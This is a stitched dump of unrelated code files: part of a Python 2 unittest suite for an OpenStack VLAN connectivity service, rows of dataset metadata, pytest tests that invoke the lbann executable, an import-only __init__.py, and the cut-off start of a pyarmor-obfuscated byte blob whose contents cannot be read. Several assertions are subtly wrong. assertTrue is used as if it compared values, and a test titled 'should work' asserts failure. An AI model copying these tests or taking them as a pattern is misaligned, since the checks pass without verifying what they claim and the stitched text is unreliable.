vlan_actions=test_vlan_actions,
logger=self.mock_logger)
self.connectivity_service.network_service.remove_subnet_and_net.assert_called_with(
openstack_session=self.os_session,
network=mock_get_network_with_vlanid_result,
logger=self.mock_logger)
self.assertTrue(results, ['Success', 'Success'])
def test_set_fail_results(self):
mock_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test_app',
actionid='test-actionid',
vm_uuid='test-vm-uuid',
interface_ip='test-ip',
interface_port_id='test-port-id',
interface_mac='test-mac')
mock_values = [mock_action_resource_info]
mock_failure_text = 'test failure test'
mock_action_type = 'test action'
results = self.connectivity_service.set_fail_results(values=mock_values,
failure_text=mock_failure_text,
action_type=mock_action_type,
logger=None)
result = results[0]
self.assertTrue(result.actionId, 'test-actionid')
self.assertTrue(result.errorMessage, mock_failure_text)
self.assertFalse(result.success)
self.assertTrue(result.type, mock_action_type)
def test_get_action_result_info_setvlan(self):
test_action_dict = {'customActionAttributes': [{'attributeName': 'VM_UUID', 'attributeValue': 'test-vm-uuid'}],
'connectorAttributes' : ''}
test_action_obj = DeployDataHolder(test_action_dict)
mock_deployed_app_resource_name = 'test app name'
mock_actionid = 'test-actionid'
result = self.connectivity_service.get_action_resource_info(deployed_app_resource_name=mock_deployed_app_resource_name,
actionid=mock_actionid,
action=test_action_obj)
self.assertTrue(result.vm_uuid, 'test-vm-uuid')
self.assertFalse(result.iface_ip)
self.assertFalse(result.interface_port_id)
self.assertFalse(result.interface_mac)
def test_get_action_result_info_removevlan(self):
test_action_dict = {'customActionAttributes': [{'attributeName': 'VM_UUID', 'attributeValue': 'test-vm-uuid'}],
'connectorAttributes' : [{'attributeName': 'Interface',
'attributeValue': '{"ip_address":"test_ip" , \
"mac_address": "test_mac","port_id":"test_port_id"}'}]}
test_action_obj = DeployDataHolder(test_action_dict)
print test_action_obj.connectorAttributes[0].attributeValue
print jsonpickle.loads(test_action_obj.connectorAttributes[0].attributeValue)
mock_deployed_app_resource_name = 'test app name'
mock_actionid = 'test-actionid'
result = self.connectivity_service.get_action_resource_info(deployed_app_resource_name=mock_deployed_app_resource_name,
actionid=mock_actionid,
action=test_action_obj)
self.assertEqual(result.vm_uuid, 'test-vm-uuid')
self.assertEqual(result.iface_ip, 'test_ip')
self.assertEqual(result.interface_port_id, 'test_port_id')
self.assertTrue(result.interface_mac, 'test_mac')
def test_attach_nic_to_instance_action_result_failure(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.attach_nic_to_net = Mock(return_value=None)
result = self.connectivity_service.attach_nic_to_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.attach_nic_to_net.assert_called_with(openstack_session=self.os_session,
instance_id='test-vm-uuid',
net_id='test netid',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'False')
def test_attach_nic_to_instance_action_result_success(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.attach_nic_to_net = Mock(return_value=True)
result = self.connectivity_service.attach_nic_to_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.attach_nic_to_net.assert_called_with(openstack_session=self.os_session,
instance_id='test-vm-uuid',
net_id='test netid',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'True')
def test_detach_nic_from_instance_action_result_failure(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.detach_nic_from_instance = Mock(return_value=None)
result = self.connectivity_service.detach_nic_from_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.detach_nic_from_instance.assert_called_with(
openstack_session=self.os_session,
instance_id='test-vm-uuid',
port_id='test_port_id',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'False')
def test_detach_nic_from_instance_action_result_success(self):
test_action_resource_info = ConnectivityActionResourceInfo(deployed_app_resource_name='test app name',
actionid='test actionid',
vm_uuid='test-vm-uuid',
interface_ip='test_ip',
interface_port_id='test_port_id',
interface_mac='test mac')
# self.connectivity_service.instance_service = Mock()
self.connectivity_service.instance_service.detach_nic_from_instance = Mock(return_value=True)
result = self.connectivity_service.detach_nic_from_instance_action_result(openstack_session=self.os_session,
action_resource_info=test_action_resource_info,
net_id='test netid',
logger=self.mock_logger)
self.connectivity_service.instance_service.detach_nic_from_instance.assert_called_with(
openstack_session=self.os_session,
instance_id='test-vm-uuid',
port_id='test_port_id',
logger=self.mock_logger)
self.assertEquals(result.actionId, 'test actionid')
self.assertEqual(result.success, 'True')
def test_perform_apply_connectivity_setvlan(self):
test_connection_request = '''{"driverRequest":{
"actions":[
{"type":"setVlan",
"actionId":"test actionID",
"actionTarget": {"fullName": "test full name"},
"connectionParams" : {"vlanId" : 42}
}
]}
}'''
mock_action_resource_info = Mock()
self.connectivity_service.get_action_resource_info = Mock(return_value=mock_action_resource_info)
self.connectivity_service.set_vlan_actions = Mock(return_value=['Success'])
actionResults = self.connectivity_service.perform_apply_connectivity(openstack_session=self.os_session,
connection_request=test_connection_request,
cp_resource_model=Mock(),
logger=self.mock_logger)
self.assertEqual(actionResults, ['Success'])
def test_perform_apply_connectivity_removevlan(self):
test_connection_request = '''{"driverRequest":{
"actions":[
{"type":"removeVlan",
"actionId":"test actionID",
"actionTarget": {"fullName": "test full name"},
"connectionParams" : {"vlanId" : 42}
}
]}
}'''
mock_action_resource_info = Mock()
self.connectivity_service.get_action_resource_info = Mock(return_value=mock_action_resource_info)
self.connectivity_service.remove_vlan_actions = Mock(return_value=['Success'])
actionResults = self.connectivity_service.perform_apply_connectivity(openstack_session=self.os_session,
connection_request=test_connection_request,
cp_resource_model=Mock(),
logger=self.mock_logger)
self.assertEqual(actionResults, ['Success'])
| 61.358663
| 129
| 0.524744
| 1,749
| 20,187
| 5.61235
| 0.068611
| 0.096781
| 0.114813
| 0.03586
| 0.859311
| 0.841076
| 0.812143
| 0.778932
| 0.764772
| 0.739914
| 0
| 0.001684
| 0.411651
| 20,187
| 328
| 130
| 61.545732
| 0.824787
| 0.010254
| 0
| 0.657258
| 0
| 0
| 0.116095
| 0.003254
| 0
| 0
| 0
| 0
| 0.145161
| 0
| null | null | 0
| 0.024194
| null | null | 0.008065
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5bde732c262786269ad527a7e301535fb8b3a033
| 5,757
|
py
|
Python
|
bamboo/unit_tests/test_unit_lbann_invocation.py
|
anmolpau/lbann
|
90c3dd0a7be644a6824ee74d59dbdbc1dfe2977e
|
[
"Apache-2.0"
] | null | null | null |
bamboo/unit_tests/test_unit_lbann_invocation.py
|
anmolpau/lbann
|
90c3dd0a7be644a6824ee74d59dbdbc1dfe2977e
|
[
"Apache-2.0"
] | null | null | null |
bamboo/unit_tests/test_unit_lbann_invocation.py
|
anmolpau/lbann
|
90c3dd0a7be644a6824ee74d59dbdbc1dfe2977e
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.insert(0, '../common_python')
import tools
import os, sys
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_no_params_bad' --exes=<executable>
def test_unit_no_params_bad(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with no params; lbann should throw exception\n')
command = tools.get_command(
cluster=cluster, executable=exe, exit_after_setup=True)
return_code = os.system(command)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_one_model_bad' --exes=<executable>
def test_unit_one_model_bad(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with no optimizer or reader; lbann should throw exception\n')
model_path = 'prototext/model_mnist_simple_1.prototext'
command = tools.get_command(
cluster=cluster, executable=exe, exit_after_setup=True,
model_path=model_path)
return_code = os.system(command)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_two_models_bad' --exes=<executable>
def test_unit_two_models_bad(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with two models but no optimizer or reader; lbann should throw exception\n')
model_path = '{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
command = tools.get_command(
cluster=cluster, executable=exe, exit_after_setup=True,
model_path=model_path)
return_code = os.system(command)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_two_models_bad2' --exes=<executable>
def test_unit_two_models_bad2(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with two models with missing {; lbann should throw exception\n')
model_path='prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
command = tools.get_command(
cluster=cluster, executable=exe, exit_after_setup=True,
model_path=model_path)
return_code = os.system(command)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_missing_optimizer' --exes=<executable>
def test_unit_missing_optimizer(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with two models, reader, but no optimizer; lbann should throw exception\n')
model_path='{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
data_reader_path='prototext/data_reader_mnist.prototext'
command = tools.get_command(
cluster=cluster, executable=exe, data_reader_path=data_reader_path,
data_filedir_default='/p/lscratchh/brainusr/datasets/MNIST',
exit_after_setup=True, model_path=model_path)
return_code = os.system(command)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_missing_reader' --exes=<executable>
def test_unit_missing_reader(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with two models, reader, but no reader; lbann should throw exception\n')
model_path = '{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
optimizer_path = 'prototext/opt_sgd.prototext'
command = tools.get_command(
cluster=cluster, executable=exe, exit_after_setup=True,
model_path=model_path, optimizer_path=optimizer_path)
return_code = os.system(command)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_bad_params' --exes=<executable>
def test_unit_bad_params(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with ill-formed param (missing -) lbann should throw exception\n')
(command_allocate, command_run, _, _) = tools.get_command(cluster=cluster, executable=exe, return_tuple=True)
command_string = '%s%s %s -exit_after_setup --reader=prototext/data_reader_mnist.prototext --model={prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext} --optimizer=prototext/opt_sgd.prototext' % (command_allocate, command_run, exe)
return_code = os.system(command_string)
assert return_code != 0
# Run with python3 -m pytest -s test_unit_lbann_invocation.py -k 'test_unit_should_work' --exes=<executable>
def test_unit_should_work(cluster, exes):
if isinstance(exes, dict):
exe = exes['gcc7']
else:
exe = exes
sys.stderr.write('TESTING: run lbann with two models, reader, and optimizer; lbann should NOT throw exception\n')
model_path = '{prototext/model_mnist_simple_1.prototext,prototext/model_mnist_simple_1.prototext}'
data_reader_path = 'prototext/data_reader_mnist.prototext'
optimizer_path = 'prototext/opt_sgd.prototext'
command = tools.get_command(
cluster=cluster, executable=exe, data_reader_path=data_reader_path,
data_filedir_default='/p/lscratchh/brainusr/datasets/MNIST',
exit_after_setup=True, model_path=model_path,
optimizer_path=optimizer_path)
return_code = os.system(command)
assert return_code != 0
| 44.976563
| 266
| 0.731631
| 810
| 5,757
| 4.930864
| 0.102469
| 0.048072
| 0.061843
| 0.081372
| 0.927892
| 0.883075
| 0.834001
| 0.80646
| 0.80646
| 0.80646
| 0
| 0.008351
| 0.167969
| 5,757
| 127
| 267
| 45.330709
| 0.82547
| 0.151815
| 0
| 0.708738
| 0
| 0.009709
| 0.324169
| 0.170291
| 0
| 0
| 0
| 0
| 0.07767
| 1
| 0.07767
| false
| 0
| 0.029126
| 0
| 0.106796
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5bea1da403d7803cc8cefdd221618192d395aaea
| 140
|
py
|
Python
|
scripts/__init__.py
|
tth030/SM_ESR_isostasy
|
fbd2ac586e8e31dd18a0988181514bc2fff7f08a
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
tth030/SM_ESR_isostasy
|
fbd2ac586e8e31dd18a0988181514bc2fff7f08a
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
tth030/SM_ESR_isostasy
|
fbd2ac586e8e31dd18a0988181514bc2fff7f08a
|
[
"MIT"
] | null | null | null |
from .scripts_geodyn1d import *
from .plot_data import *
from .plot_profiles import *
from .book_lith import *
from .book_deltarho import *
| 23.333333
| 31
| 0.785714
| 20
| 140
| 5.25
| 0.5
| 0.380952
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008333
| 0.142857
| 140
| 5
| 32
| 28
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
752a31e25531a75adf562c9743298c0fcaabd789
| 48,495
|
py
|
Python
|
legacy/functional_code/backprojection/simulate_sar_data.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | 1
|
2020-02-09T19:09:27.000Z
|
2020-02-09T19:09:27.000Z
|
legacy/functional_code/backprojection/simulate_sar_data.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | null | null | null |
legacy/functional_code/backprojection/simulate_sar_data.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\xe4\x50\x8c\x64\x26\x42\xd6\x01\x92\x66\xef\x19\xf6\xf6\xdc\x27\x16\xfe\x75\x04\x29\xbd\xb6\xbc\xc7\x79\xa1\xc5\x05\x31\xe3\x6d\x2b\x3d\x7e\xd9\x90\x07\x71\xd3\x44\x59\x4e\xf5\xdc\xde\xb5\xb7\x72\xac\x15\x3a\xaf\x50\xae\x13\x28\xde\x30\x1b\xbe\x39\xaa\xe9\x1c\x07\x04\x91\x4d\x31\x7a\x2f\xde\xfc\xa1\xad\x16\xd3\xf1\xb4\x44\xb0\x12\x31\xab\xf7\x4b\xc0\x38\xdb\xda\x22\x54\xe9\xbd\xfa\x25\xc2\xde\xea\xe7\x3a\xe4\xeb\x23\x2e\xa6\x21\xd0\x55\x41\x04\x08\xba\xb9\x54\xda\xa7\xd9\xd1\x82\xef\x36\x40\xdf\x5b\xdd\xe8\x69\x8d\x20\x4e\xda\x5a\xf0\xac\xfa\x75\x48\x62\xc5\xb9\x57\x41\xee\x84\xab\x36\x60\x5b\xa7\xd4\x8f\xa1\x3d\x68\x28\x70\xf9\xc0\xd3\xda\xda\xb6\x00\x7b\x0e\x1c\x43\xcd\xab\x1c\x49\xe6\x51\x7f\xb3\x6d\xce\x27\x48\xc7\xd9\xa6\xc6\x73\x8c\x82\x66\x91\x56\x2a\xa7\x08\x6b\xb1\x63\x46\xda\xb7\x90\x9d\x3b\xac\x56\xc7\x80\xbc\xd0\x91\x8b\xef\x82\x21\x59\x71\xda\x64\x1f\x5f\x3a\xc3\x9c\x98\xd9\x45\xdd\x0e\x26\x1f\x50\x38\x44\xd1\xda\xfb\x62\x8b\x71\x4a\x7f\xb1\xc9\xf9\x67\x23\x6f\xf7\xe2\x75\x98\x93\xa7\x43\x62\xbe\x04\x73\xc0\x27\xd6\xec\x6b\xe3\xe6\x0e\x27\xb3\x0d\x49\xf2\xf7\x1f\x13\x8b\xfb\xe7\xad\xa2\x43\xf3\x80\xda\x48\x8a\xc0\x27\x7c\x07\xc7\x0a\x8b\x89\xe0\x87\xc3\x4c\xa7\xcb\xbf\x48\x87\xb3\xe6\x41\x16\x92\xb0\xc6\x11\xb4\xc7\xa3\xde\xcc\x65\x70\x15\x5e\x14\xf5\x71\xb4\x75\xb2\xde\x53\xe4\x74\x40\xe0\x51\x31\x50\xb0\x88\x7a\x1f\xe1\x6e\x35\xca\x23\x19\xb7\x39\xf7\xeb\xaa\x1e\xb7\xcb\xb5\x9a\x0a\x4f\x6a\x7f\xf8\x13\x58\xac\x88\x51\xf6\xac\x84\x93\x99\x6b\xea\x12\xcc\x08\xd9\x50\x3e\x66\x07\x9b\x01\x33\xc7\x35\xf6\x1b\x6a\x59\xe2\x49\x8c\xd7\x22\x05\xa6\x17\x67\x23\x9b\x5f\x7a\x46\x13\x41\x51\xb1\x9d\xcc\x67\x93\x20\xa5\x7d\xbb\x94\x64\x6d\x42\x3b\xc2\xf8\xf0\x6b\xc3\xb8\xdf\x24\x5b\xc5\x30\x5d\x0f\x69\x9f\x7d\x7b\x29\x80\x00\x9c\x51\xff\x68\xff\xb6\xd5\x9b\x05\xaa\x91\xb6\x21\xba\x16\x5d\xe3\xd0\x6a\xdd\x1b\x8d\x67\x5b\xdb\x02\x1b\xa8\x8a\x5c\x03\x47\xcc\x13\x8d\x6f\x29\xce\xbc\xc0\x65\x33\xe5\x61\xbf\x92\xe8\xef\x81\xe8\x1e\xfa\x7f\xcc\x99\x20\x7f\xbb\xbc\x5f\x45\x42\x1a\x3f\x56\xbf\x02\x8e\xb6\xff\x0d\xdf\x3a\x08\xb9\x3d\x79\x7e\x83\xbe\xe1\xfd\xcb\xe3\x1b\x05\xdb\xce\x22\x3c\x71\xd9\x6e\xbe\x7b\xc4\x94\xae\x6a\x82\xe5\xd9\xf7\x9a\xcd\x67\x9f\xc8\x97\x26\x13\x38\xaf\x28\x97\x7f\x07\xa3\x89\xd4\x0d\x96\x07\xf4\x78\xab\x5a\xeb\x6a\xcd\xd7\x6a\x54\x8c\x6e\xd7\x55\x7f\x53\x12\x4b\x8d\x38\xe1\x09\xe0\x68\x9a\xe6\x3d\x5c\x71\x63\x6f\x31\xaa\xd0\x46\x99\x69\x6f\x6e\x45\x40\x35\x1c\xc3\x87\xba\x03\x98\xf1\xac\x95\xd9\xa5\xa9\x62\x3a\xde\x30\xe6\x1c\xef\xb0\x25\x18\xfe\xfa\xe2\x25\x61\xc4\x2f\x4d\xd7\xd4\xc4\x50\x9a\xdd\xcf\x9f\xab\x1a\x0d\xb5\x1a\xff\x6f\xd7\xe5\x35\x43\x82\x23\xbc\x6e\x25\x3b\xee\xb6\xfe\x35\xd0\x2e\x08\xd2\x88\x25\x96\x2a\x84\xc6\xc9\x16\xea\x24\x77\xdc\x63\x27\x47\x48\xc8\x18\x6c\x83\x8c\x75\x15\x49\x81\xd4\xcc\x47\x34\x98\xd9\x1b\xd3\x5d\x87\xf0\x51\xb3\x27\x64\x32\x41\x08\x2a\xf2\xd9\xa6\x8e\x33\x86\x23\xb6\xdd\xf1\x0b\xde\x0e\x26\x7e\x4a\x65\xb8\xa1\x4d\x0e\x87\x04\x19\xc3\x84\xbf\xa2\x80\x91\x12\x25\xfb\x8d\xf7\xb5\x72\xb6\x11\x9e\x3a\x08\x43\xdd\x0d\xec\x6a\xb0\xcd\x1d\x2d\x3a\x90\x22\x79\x52\x2b\x44\x22\x22\x14\x5f\xc3\x2b\x0f\xcb\xbe\x27\x3a\x82\x20\x90\x0c\xb4\xdf\xd7\x7e\xb3\xad\x70\xcf\xab\x59\x5f\xa0\xf5\x96\x19\x60\x35\x32\xb6\x65\x5b\xe8\x76\x34\xaa\xbf\x6e\x4b\x4d\xa8\x50\x9b\x3d\x2a\x55\xdf\xa5\xdd\xf1\xa6\xf3\x11\xbe\x54\x3a\x59\x45\xae\x65\x0b\x71\x1a\xb9\x41\xd0\x26\xdf\xdf\xdd\x45\xdf\x49\x22\x29\xe7\xa2\x8d\x10\xc6\x75\xab\x11\x1e\x4e\x34\x93\xbe\x01\xe7\x4d\xd9\x34\x0d\xbf\x32\x8f\x52\xe3\x4e\x6f\x1c\xca\x8e\xb6\x62\x4b\x6e\xf8\x56\x7d\x75\xf0\x48\x9f\x11\xfc\x00\xf5\xd7\x9b\xbf\x3c\x9b\xfa\x68\xba\x2f\xd0\x97\xb7\xc0\xe3\x8d\xe0\x7f\x95\xb6\x60\x55\xe0\x30\xf9\xc5\x64\x1b\x84\xe7\x45\x27\x70\x65\xa8\x02\xcc\xcc\x94\x76\x44\xc7\x87\x4e\x7e\xe5\x6b\x74\xe0\x0a\xc8\x98\xd4\xc3\x4d\x6b\xfc\xd9\x64\x9f\x2d\x18\x2c\xd0\x86\x78\xe1\xa8\x1c\x18\x1d\x0c\x2b\x8d\x89\x35\x9f\x7d\x5b\x31\xb0\xab\x68\x0f\x29\x38\x14\xd9\x13\x28\x00\x7a\x18\x6e\x1e\xb6\xd4\x78\xe6\x25\x28\xae\xb3\x23\x18\x8a\x4f\x99\x50\x23\x6f\x5a\xa4\x72\xb4\x45\x8f\x6c\xdc\x87\x2d\x6f\xcb\x48\x06\x7a\x56\xe1\xd9\x4b\x78\x04\x13\xf5\x25\xf9\xd3\x7e\x1d\x1f\xd0\x8d\x30\xd6\x20\xa0\x2d\xc0\x7d\x6e\xf4\x06\x13\xa7\xc4\x8b\xc4\xae\x52\xa0\x4a\x3a\x6b\xee\x36\xe2\x5e\x01\xaa\xdd\x5b\x66\xef\x66\xbc\x7b\x96\x38\xca\x88\x22\x6c\x62\xfb\xba\xff\xa2\xa5\xe1\x07\xa3\x69\xd4\xb2\xcf\x35\xa9\x26\x61\x47\x83\x46\x44\x9d\x6b\x69\xb1\x15\xfe\x83\xe5\x19\xe2\xf5\x4d\xe8\xe4\x69\xa5\xff\x13\xa2\xd0\x4c\xf9\x80\xf9\x25\x26\x93\xaf\x75\xaa\xf1\xcd\x40\xf9\x94\x86\xe4\x3b\x1e\x70\xdb\xdd\xa8\x77\x35\xa2\xa0\xe8\xdd\xa3\x3d\xb9\x1a\xb1\xa9\xf8\x3f\xd8\x67\x03\x73\x49\x67\x40\x9e\xd7\x4a\xa1\xc7\x7b\xb7\xaa\x44\x01\xcc\x8c\x0f\x5d\xd8\x5b\xe6\x4f\x2e\x6a\x75\xf9\x32\xc2\x5c\x7c\x69\xf3\x88\x79\x57\x72\x32\xaa\xa5\x94\xef\xa7\x73\x20\xca\x26\x54\xd8\xd0\xb0\xbf\xeb\x84\xad\x99\x6c\xed\xca\x06\xe9\xcf\xcc\xae\x82\x46\xff\xc3\xfe\x02\xa9\x73\xb1\x44\xe0\xf1\xf8\xea\x03\xe4\xb8\x41\xe7\xef\xd5\x0a\x52\xf4\xae\xb8\x74\x9e\x34\x97\x60\x40\xcd\x6b\x2c\x23\x13\x8e\x37\x0e\x34\x39\x35\xf2\x6a\x39\x22\x0d\xd2\x9e\x9e\x94\x22\x42\xd4\xac\x3b\xaa\x1e\x71\xf3\x5f\x46\xd6\xf0\x2e\x8a\x04\x82\xa2\xbb\x94\x28\x56\xb4\x9f\x97\xd1\x69\x88\x40\xfe\xe2\xa1\xe6\x24\x94\x34\xaf\x4d\xba\x21\x23\x4b\x26\x21\x44\x76\x26\x04\x89\xb2\x95\x80\xa1\xf5\xaa\x46\x3b\xcc\xad\xbb\xfc\x3a\xdb\x5e\x78\xf3\xf9\xcf\x0a\x2c\xc9\xde\x30\x97\x62\x2c\xde\xf7\x5b\x60\x58\x3e\x6e\xb7\xb3\x09\x95\xba\xda\xe7\x95\x5a\x1f\xc1\xd7\xda\xe7\xe4\xe7\xfb\xf8\x53\x47\x81\xc5\x98\xea\x74\x61\xbe\xed\xa3\x67\x05\x5e\x0e\xa8\xfd\x11\x0c\x59\xee\xf2\x82\xe3\x13\x36\xd8\xdb\xab\xb1\x6e\x41\x49\x69\xac\x1a\xca\x15\x61\x3b\xb2\xa6\xf7\xc6\x0c\xff\xfe\xe9\xb3\x55\x0a\xee\xc9\xbc\xd5\x38\xa8\x0d\x24\x3f\xbb\x8d\x1f\x70\xf8\xe9\x72\xfd\x82\xf0\xeb\xc0\xfa\x12\xc7\x83\x19\xa6\xd5\x7e\x76\x71\x0d\xe1\x97\x96\x1a\x91\xb4\x71\xa5\xc3\x28\x68\xc7\xf5\x65\x91\x10\x15\x83\xa6\x46\x2a\x34\xa0\x03\xb1\x11\x63\x37\x40\x24\x44\x22\x8c\xc2\xd8\x46\x45\xcc\xc1\x6c\xa3\xcc\x0c\x32\x20\x2e\xd7\x61\x01\x5f\x37\xaa\x91\x6b\x66\xd9\x10\x78\xe7\xea\x58\xf3\xaa\xaf\xb9\x39\x31\x2a\xe4\x53\x16\x79\x8a\x17\x1d\x00\xc3\x0a\x30\x2b\x90\xc0\xd7\xc0\x6b\xcb\x22\x96\xa4\x40\xbd\x07\x1c\xcc\x88\x4f\x4b\x72\x00\x2b\x9f\xc9\x55\x2f\x33\xb6\x7c\xd2\x1f\x86\xc5\x9b\xc1\x8e\xe3\xa3\x6e\x05\x8c\xbc\x07\x26\x6c\xa9\x98\x8a\x28\x06\xb4\xb4\x53\xfa\xc6\x9b\xdd\xe7\x60\x46\xb3\x16\x75\xa8\x22\x14\xcb\x19\xd6\x9d\xad\x86\x21\xff\xa8\x6e\x9c\x62\x76\x76\x0c\x53\xc1\x74\x45\xcf\x13\xbc\x5b\x69\x0e\xfa\x84\x40\xd0\xff\x4e\x0b\xee\x4f\x71\x74\xd6\x97\x24\x5c\xbb\xc7\x09\xd6\x32\x07\xf1\xc4\x89\x1e\x11\x72\x76\x4e\xfa\x4a\x39\xdc\x7c\xfd\xb0\xdf\xda\xd9\x9b\x94\xab\xac\xa5\xc6\x0f\x64\x9e\xfa\x2a\x4d\xf6\x0f\x92\x30\x9f\x45\x75\xce\x07\x72\x79\xe0\xdf\x3d\x8d\xb2\x4a\x0d\x2b\x3c\xb9\x49\x75\xef\x3b\xed\xe2\x9b\xbf\xc7\x88\x9f\xcd\xd4\xaa\x4c\x9f\x26\x47\xd3\x5d\x6e\xf5\xba\x96\x60\x6a\x55\xa5\x8d\xf8\x64\xfd\xa4\x26\xed\x0f\x59\xe1\x0f\xd8\x7d\x13\xfc\xc7\x82\x81\x7c\x41\x83\x52\x93\xcc\x03\xf0\x5c\xff\xa1\xed\xe2\x29\xb2\xf5\x51\x65\xd0\x5d\x68\xe7\xa1\x2f\x35\x5a\xc4\xcc\xe8\xb0\x4f\x3c\x82\x78\xf8\x69\x51\xdc\xd0\xe4\x25\x35\xf7\x4a\x92\xec\x99\x89\xb4\x08\xa5\x6f\x94\xf7\x61\x26\x9b\x42\xa7\xb6\x50\xee\xcd\x0a\xd4\x92\xb4\x91\xb1\x32\xa0\xa3\xe4\xe0\x37\xff\x1d\x6a\x89\x8f\xd1\xc8\xd7\x0b\x3f\x1e\x92\xdf\xd7\x7d\x66\x60\xb3\xde\x16\x80\x9b\xac\xd6\x94\x99\xda\x0f\xb4\x2d\xe9\xfe\x90\x71\x17\xbf\x6a\x83\x95\xdf\x2e\x0d\xcb\xff\x38\x17\x77\x02\x03\xa5\xe9\xb0\xdc\x3e\x11\x24\x14\x71\x0b\x7b\xc8\xee\x74\xf2\x29\xbf\xb9\x4f\x2a\x8b\x64\xde\x86\xc5\x6a\x97\x9d\xf2\x7a\x10\xd4\xb2\x68\xb3\x20\xa4\x77\xa2\x08\x30\xe5\x42\x51\x2c\x37\x90\x39\x29\x37\x41\x95\x7f\x9f\xbf\x86\x91\x73\x79\x65\x7c\xee\x56\x89\x04\xbe\xd3\xf9\x28\x15\xf4\xc5\x49\x4f\x80\xbe\xa5\x1e\x0f\x07\x61\x0e\x45\x12\x35\x85\x2c\x83\x54\x7d\x82\x11\x59\x2b\x89\x96\x78\x09\xf0\x7e\xd6\x62\xd1\x1b\x60\x1a\x63\x4f\xf1\x3d\x39\x57\x10\x2d\x07\x90\x75\x72\x7c\x95\x5b\x1b\xf2\xee\xac\x33\x2a\x9a\x8a\x43\xd7\xb3\x79\x85\xa1\xac\x6c\xc6\x07\xd9\x22\x8e\xab\x36\x49\x